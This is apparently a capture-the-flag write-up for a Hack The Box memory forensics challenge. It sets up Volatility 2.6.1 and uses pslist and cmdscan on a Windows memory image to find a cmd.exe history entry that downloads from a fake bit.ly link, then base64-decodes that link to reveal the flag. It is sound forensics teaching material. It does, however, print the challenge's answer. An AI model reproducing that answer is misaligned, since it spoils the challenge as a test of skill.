We are given an image file in .raw from HTB. I found a tool called volatility that we can use.
I downloaded the source for Volatility v2.6.1 from their GitHub, here.
Note, I tried using the new Volatility3, but it is missing essential plugins that I needed to use to complete this challenge.
Volatility v2 uses Python2, which at the time of writing is no longer supported, so there is some additional setup required to remove errors.
$ curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
# where the pip2 installed was not in my path, so I had to use this to call it
# pycrypto is no longer supported either
$ /home/kali/.local/bin/pip2 install pycryptodome
$ git clone https://github.com/gdabah/distorm.git
$ cd distorm
$ python setup.py build
$ sudo python setup.py build installI found a cheat sheet from SANS on using Volatility to analyze memory:
https://www.sans.org/posters/memory-forensics-cheat-sheet/
It outlines 6 crucial steps to take:
PreReq:
I set the location using an export command like so:
$ export VOLATILITY_LOCATION=file:///home/kali/Downloads/WIN-LQS146OE2S1-20201027-142607.rawNow we can run ./vol.py imageinfo to get available profiles. The top pick is Win7SP1x64 and we can set that via:
$ export VOLATILITY_PROFILE=Win7SP1x64Identify Rogue Processes
With our environment variables set, we can begin.
Running pslist shows we have a cmd.exe running as process 1640. Using the cheatsheet, we can run cmdscan to see if we can get any command history:
We can see the command line is downloading a file from a bit.ly link. We can URL decode this to display:
http://bit.ly/SFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30=Now that is not an actual bit.ly link. We can see that the URL appears to be base 64 decode. If we run
$ echo "SFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30=" | base64 -dIt turns out this is our flag!
